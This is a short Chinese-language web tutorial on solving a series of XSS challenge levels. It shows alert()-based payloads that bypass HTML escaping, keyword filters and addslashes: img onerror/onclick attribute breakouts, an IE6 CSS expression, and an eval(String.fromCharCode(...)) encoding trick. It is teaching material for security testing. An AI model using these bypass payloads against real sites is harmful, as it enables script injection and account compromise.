xss的小測試是怎麼進行的
May 19, 2023 am 11:37 AM
xss
無安全性方面的限制,直接使用
<script>alert(/xss/);</script>
#限制條件:只能使用CSS,不允許使用html標籤
我們知道利用expression可以用來建構XSS,但只能在IE下面測試,所以下面的測試請在IE6中執行。
body {
black;
xss:alert(/xss/));/*IE6下测试*/
}登入後複製
限制條件:對HTML進行了轉義,Image標籤可用。
測試輸入的字元會被插入到src位址中,那麼可以使用偽協定來繞過。
直接輸入
alert( /xss/);
登入後複製
或你也可以使用事件來繞過,注意閉合語句即可,如下:
1" onerror=alert(/xss/); var a="1
限制:使用了關鍵字過濾。
我測試了一下,大部分都過濾了,有部分未過濾,經過測試script/onerror過濾了,但是onclick未過濾,使用onclick事件繞過
<img src=# onclick=alert(/xss/);>
登入後複製
限制條件:使用addslashes對特徵字元進行了轉義
也就是說我們的XSS語句中不能出現單引號,雙引號等等特徵字元。
直接使用
<script>alert(/xss/);</script>
登入後複製
即可繞過
或使用String.fromCharCode方法,如下:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
登入後複製
以上是xss的小測試是怎麼進行的的詳細內容。更多資訊請關注PHP中文網其他相關文章!
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門文章
兩個點博物館:邦格荒地地點指南
4 週前
By 尊渡假赌尊渡假赌尊渡假赌
擊敗分裂小說需要多長時間?
3 週前
By DDD
倉庫:如何復興隊友
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒險:如何獲得巨型種子
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
公眾號網頁更新緩存難題:如何避免版本更新後舊緩存影響用戶體驗?
3 週前
By 王林
熱門文章
兩個點博物館:邦格荒地地點指南
4 週前
By 尊渡假赌尊渡假赌尊渡假赌
擊敗分裂小說需要多長時間?
3 週前
By DDD
倉庫:如何復興隊友
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island冒險:如何獲得巨型種子
3 週前
By 尊渡假赌尊渡假赌尊渡假赌
公眾號網頁更新緩存難題:如何避免版本更新後舊緩存影響用戶體驗?
3 週前
By 王林
熱門文章標籤
記事本++7.3.1
好用且免費的程式碼編輯器
SublimeText3漢化版
中文版,非常好用
禪工作室 13.0.1
強大的PHP整合開發環境
Dreamweaver CS6
視覺化網頁開發工具
SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)
